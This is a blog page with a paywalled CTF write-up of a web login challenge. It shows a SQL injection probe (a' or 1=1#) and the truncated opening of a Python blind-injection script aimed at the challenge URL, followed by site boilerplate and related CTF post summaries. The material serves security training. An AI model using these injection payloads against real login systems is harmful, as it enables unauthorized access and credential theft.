“百度杯” CTF比赛 十月场 Web-登录

最新推荐文章于 2023-06-25 10:00:46 发布
VIP文章 最新推荐文章于 2023-06-25 10:00:46 发布
阅读量1.4k 收藏 3
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34106499/article/details/104380389
版权

1. 浏览

浏览网址:

在这里插入图片描述

按流程先把源码、请求头、响应头查看一遍,没有线索,尝试弱口令登录,提示用户名不存在

2. 注入

用户名输入a' or 1=1#,密码随便,提示密码错误,存在注入点。

编写注入脚本如下:

# -*- coding: utf-8 -*-
import requests

url="http://84b5fe286b214096b9d0a44928cddd242fb7291df5c24b54.changame.ichunqiu.com/Challenges/login.php"
contentchr_list=list('1234567890qwertyuiopasdfghjklzxcvbnm')

def judge_response(name):
    headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
    payload = dict(username=name, password='test')
    response = requests.post(url=url, data=payload, headers=headers)
    judgement = response.text.__len__()
    if judgement == 4:
        return Tr
最低0.47元/天 解锁文章
xnudhi
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
ctfshow
charon145的博客
01-15 1116
第三题 抓包,获得flag
ctf解题--后台登录web)
热门推荐
qq_36791003的博客
08-16 1万+
题目 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开连接 查看源码 通过post方式给password变量传值 md5加密后拼接sql查询语句到后台执行 后面的判断就是要求sql语句要成功执行 MD5函数 参考链接:http://www.w3school.com.cn/ph...
一次实战CTF-WEB(多重登录机制中的缺陷)
qq_43550748的博客
10-25 316
要求登录admin账号 1.登录界面 我们发现有找回密码这个易受攻击点 2.直奔找回密码 通过观察前两个阶段url(reset1.htm1 reset2.html),我们推测出了第三个阶段的url(reset3.html) 第一阶段 第二阶段 第三阶段 先在重设密码第一阶段输入admin,然后更改url直接绕过第二阶段邮箱验证,进入第三阶段 设置新密码。此时,网站爆出系统错误,看来是不行了...
Hackthebox系列 ctf首页无法登录
xujing19920814的博客
10-24 1147
https://ctf.hackthebox.com/无法登录
ctf-WEB-login2(sql注入)
god_001的博客
05-12 2279
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
CTF练习-Web1简单登录
weixin_43992606的博客
06-25 1118
CTF初入门小白,记录做题过程。
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3316
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
一道简单的CTF登录题题解
anquanniu的博客
03-06 8085
一、解题感受 这道题50分,在实验吧练习算比较高分,而且通过率只有14%,比较低的水平。 看到这两个数据,一开始就心生惬意,实在不应该呀! 也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入都失败后,有些急躁,然后就早早拜读了pcat大神的攻略。。。 在攻略的帮助下,顺利完成题目。 所以本文主要是在pc...
CTF-WEB 一个登录框SQL盲注
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
CTF 比赛全量指南(ctf-all-in-one).pdf
08-19
包含CTF比赛各类题型的介绍、基础知识以及例题实战讲解。非常适合新人入门学习,学通这本基本上可以在赛上有一战之力了。
CTF中PHP常见漏洞及利用(未完待续)
qq_34106499的博客
01-25 4905
总结ctf中出现的php漏洞及利用
i春秋 第二届春秋欢乐赛 Web-Hello World
qq_34106499的博客
01-20 1227
1. git源码泄露问题 2. 了解git源码泄露的原理及其漏洞利用 3. 待进一步掌握。。。
2020年春秋新春战“疫”网络安全公益赛——盲注
qq_34106499的博客
03-04 705
准备总结一下常见的sql注入及过滤,拿出这道题来回顾一下
百度CTF比赛 2017 二月 — 爆破-1(10分)
qq_34106499的博客
01-14 582
1. 文件包含的利用:include()函数; 2. $_REQUEST函数的使用; 3. 正则匹配的使用:pre_match()函数; 4. eval()函数的利用; 5. 全局变量$GLOBALS的利用;
福建闽盾 ctf比赛题目
最新发布
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海省份,具有独特的地理、人文和历史背景。以此为题目,可以设计与福建相关的题目,如“福建的历史文化”、“福建的名胜古迹”、“福建特色美食”等等。选手在解答题目过程中,需要了解福建的相关知识,并运用自己的搜索、分析和解决问题的能力,最终找到答案。 而“闽盾”是指福建省网络安全协会举办的一项CTF比赛。我无法提供具体的题目,因为每届比赛的题目都不同,涵盖的领域也各有不同。根据以往比赛的经验,题目的类型可以包括密码学、网站漏洞、二进制安全、逆向工程、隐写术等等。选手需要在限定时间内根据提示或已给出的信息,分析、解决问题并提交答案。 CTF比赛旨在提高选手的网络安全技能、加深对信息安全的理解和运用,并且培养团队合作和应急响应的能力。福建闽盾作为一项有影响力的CTF比赛,吸引了许多对网络安全感兴趣的人士参与。参赛者可以通过参加该比赛,不断学习、提升自己的技术水平,同时也为网络安全事业贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值